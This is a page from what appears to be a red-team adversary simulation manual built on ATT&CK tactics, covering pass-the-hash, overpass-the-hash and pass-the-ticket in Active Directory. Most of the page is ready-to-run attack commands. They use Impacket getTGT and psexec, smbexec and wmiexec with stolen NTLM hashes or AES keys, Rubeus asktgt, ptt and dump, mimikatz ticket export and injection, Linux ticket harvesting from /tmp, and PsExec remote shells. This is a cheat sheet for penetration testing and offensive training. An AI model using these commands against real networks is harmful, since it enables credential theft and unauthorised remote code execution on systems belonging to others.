Joined Adversary Simulation Manual
  • Joined Adversary Simulation Manual
  • Reconnaissance
    • Active Scanning
    • Gather Victim Host Information
    • Gather Victim Identity Information
    • Gather Victim Network Information
    • Gather Victim Org Information
    • Phishing for Information
    • Search Closed Sources
    • Search Open Technical Databases
    • Search Open Websites/Domains
    • Search Victim-Owned Websites
  • Resource Development
    • Acquire Infrastructure
    • Compromise Accounts
    • Compromise Infrastructure
    • Develop Capabilities
    • Establish Accounts
    • Obtain Capabilities
  • Initial Access
    • Drive-by Compromise
      • WiFi Attacks
    • Exploit Public-Facing Application
    • External Remote Services
    • Hardware Additions
    • Phishing
    • Replication Through Removable Media
    • Supply Chain Compromise
    • Trusted Relationship
    • Valid Accounts
  • Execution
    • Command and Scripting Interpreter
    • Exploitation for Client Execution
    • Inter-Process Communication
    • Native API
    • Scheduled Task-Job
    • Shared Modules
    • Software Deployment Tools
    • System Services
    • User Execution
    • Windows Management Instrumentation
  • Persistence
    • Account Manipulation
    • BITS Jobs
    • Boot or Logon Autostart Execution
    • Boot or Logon Initialization Scripts
    • Browser Extensions
    • Compromise Client Software Binary
    • Create Account
    • Create or Modify System Process
    • Event Triggered Execution
    • External Remote Services
    • Hijack Execution Flow
    • Implant Container Image
    • Office Application Startup
    • Pre-OS Boot
    • Scheduled Task-Job
    • Server Software Component
    • Traffic Signaling
    • Valid Accounts
  • Privilege Escalation
    • Abuse Elevation Control Mechanism
    • Access Token Manipulation
    • Boot or Logon Autostart Execution
    • Boot or Logon Initialization Scripts
    • Create or Modify System Process
    • Event Triggered Execution
    • Exploitation for Privilege Escalation
    • Group Policy Modification
    • Hijack Execution Flow
    • Scheduled Task-Job
    • Process Injection
    • Valid Accounts
  • Defense Evasion
    • Abuse Elevation Control Mechanism
    • Access Token Manipulation
    • BITS Jobs
    • Deobfuscate-Decode Files or Information
    • Direct Volume Access
    • Execution Guardrails
    • Exploitation for Defense Evasion
    • File and Directory Permissions Modification
    • Group Policy Modification
    • Hide Artifacts
    • Hijack Execution Flow
    • Impair Defenses
    • Indicator Removal on Host
    • Indirect Command Execution
    • Masquerading
    • Modify Authentication Process
    • Modify Cloud Compute Infrastructure
    • Modify Registry
    • Modify System Image
    • Network Boundary Bridging
    • Obfuscated Files or Information
    • Pre-OS Boot
    • Process Injection
    • Rogue Domain Controller
    • Rootkit
    • Signed Binary Proxy Execution
    • Signed Script Proxy Execution
    • Subvert Trust Controls
    • Template Injection
    • Traffic Signaling
    • Trusted Developer Utilities Proxy Execution
    • Unused-Unsupported Cloud Regions
    • Use Alternate Authentication Material
    • Valid Accounts
    • Virtualization-Sandbox Evasion
    • Weaken Encryption
    • XSL Script Processing
  • Credential Access
    • Brute Force
    • Credentials from Password Stores
    • Exploitation for Credential Access
    • Forced Authentication
    • Input Capture
    • Man-in-the-Middle
    • Modify Authentication Process
    • Network Sniffing
    • OS Credential Dumping
    • Steal Application Access Token
    • Steal or Forge Kerberos Tickets
    • Steal Web Session Cookie
    • Two-Factor Authentication Interception
    • Unsecured Credentials
  • Discovery
    • Account Discovery
    • Application Window Discovery
    • Browser Bookmark Discovery
    • Cloud Infrastructure Discovery
    • Cloud Service Dashboard
    • Cloud Service Discovery
    • Cloud Trust Discovery
    • Domain Trust Discovery
    • File and Directory Discovery
    • Network Service Scanning
    • Network Share Discovery
    • Network Sniffing
    • Password Policy Discovery
    • Peripheral Device Discovery
    • Permission Groups Discovery
    • Process Discovery
    • Query Registry
    • Remote System Discovery
    • Software Discovery
    • System Information Discovery
    • System Network Configuration Discovery
    • System Network Connections Discovery
    • System Owner-User Discovery
    • System Service Discovery
    • System Time Discovery
    • Virtualization-Sandbox Evasion
  • Lateral Movement
    • Exploitation of Remote Services
    • Internal Spearphishing
    • Lateral Tool Transfer
    • Remote Service Session Hijacking
    • Remote Services
    • Replication Through Removable Media
    • Software Deployment Tools
    • Taint Shared Content
    • Use Alternate Authentication Material
  • Collection
    • Archive Collected Data
    • Audio Capture
    • Automated Collection
    • Clipboard Data
    • Data from Cloud Storage Object
    • Data from Configuration Repository
    • Data from Information Repositories
    • Data from Local System
    • Data from Network Shared Drive
    • Data from Removable Media
    • Data Staged
    • Email Collection
    • Input Capture
    • Man in the Browser
    • Man-in-the-Middle
    • Screen Capture
    • Video Capture
  • Command and Control
    • Application Layer Protocol
    • Communication Through Removable Media
    • Data Encoding
    • Data Obfuscation
    • Dynamic Resolution
    • Encrypted Channel
    • Fallback Channels
    • Ingress Tool Transfer
    • Multi-Stage Channels
    • Non-Application Layer Protocol
    • Non-Standard Port
    • Protocol Tunneling
    • Proxy
    • Remote Access Software
    • Traffic Signaling
    • Web Service
  • Exfiltration
    • Automated Exfiltration
    • Data Transfer Size Limits
    • Exfiltration Over Web Service
    • Exfiltration Over Alternative Protocol
    • Exfiltration Over C2 Channel
    • Exfiltration Over Other Network Medium
    • Exfiltration Over Physical Medium
    • Exfiltration Over Web Service
    • Scheduled Transfer
    • Transfer Data to Cloud Account
  • Impact
    • Account Access Removal
    • Data Destruction
    • Data Encrypted for Impact
    • Data Manipulation
    • Defacement
    • Disk Wipe
    • Endpoint Denial of Service
    • Firmware Corruption
    • Inhibit System Recovery
    • Network Denial of Service
    • Resource Hijacking
    • Service Stop
    • System Shutdown-Reboot
  • General Pentesting
    • Services
    • SSL related Commands
    • Web useful commands
    • Reverse Shells
    • DB related Commands
    • VLAN Attacks
    • AD Bruteforcing
    • JWT Attacks
  • Tricks
  • Tools
    • AD Tools
    • Mobile Tools
    • Tools
    • WiFi Tools
    • LAN Tools
    • LAN Tools
  • Contributors
  • Kudos, References and Further Reading
Powered by GitBook
On this page
  • Application Access Token
  • Pass the Hash
  • Overpass The Hash/Pass The Key (PTK)
  • Pass the Ticket
  • Pass The Ticket (PTT)
  • Web Session Cookie

Was this helpful?

  1. Lateral Movement

Use Alternate Authentication Material

Application Access Token

Pass the Hash

Overpass The Hash/Pass The Key (PTK)

Impacket

Request the TGT with hash

python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>

Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)

python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>

Request the TGT with password

python getTGT.py <domain_name>/<user_name>:[password]

Set the TGT for impacket use

export KRB5CCNAME=<TGT_ccache_file>

Execute remote commands with any of the following by using the TGT

python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Rubeus and PsExec

Ask and inject the ticket

.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt

Execute a cmd in the remote machine

.\PsExec.exe -accepteula \\<remote_hostname> cmd

Pass the Ticket

Pass The Ticket (PTT)

Harvest tickets from Linux

  • Check type and location of tickets:

    grep default_ccache_name /etc/krb5.conf

  • If none return, default is FILE:/tmp/krb5cc_%{uid}.

  • In case of file tickets, you can copy-paste (if you have permissions) for use them.

cp tickey /tmp/tickey
/tmp/tickey -i

Harvest tickets from Windows

mimikatz # sekurlsa::tickets /export
.\Rubeus dump

After dump with Rubeus tickets in base64, to write the in a file

python ticket_converter.py ticket.kirbi ticket.ccache
python ticket_converter.py ticket.ccache ticket.kirbi

Using ticket in Linux:

Set the ticket for impacket use

export KRB5CCNAME=<TGT_ccache_file_path>

Execute remote commands with any of the following by using the TGT

python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Using ticket in Windows

mimikatz # kerberos::ptt <ticket_kirbi_file>
.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
.\PsExec.exe -accepteula \\<remote_hostname> cmd

Web Session Cookie

PreviousTaint Shared ContentNextCollection

Last updated 4 years ago

Was this helpful?

In case of being *KEYRING* tickets, you can use to get them:

With :

With in Powershell:

To convert tickets between Linux/Windows format with :

Inject ticket with :

Inject ticket with :

Execute a cmd in the remote machine with :

tickey
Mimikatz
Rubeus
ticket_converter.py
Mimikatz
Rubeus
PsExec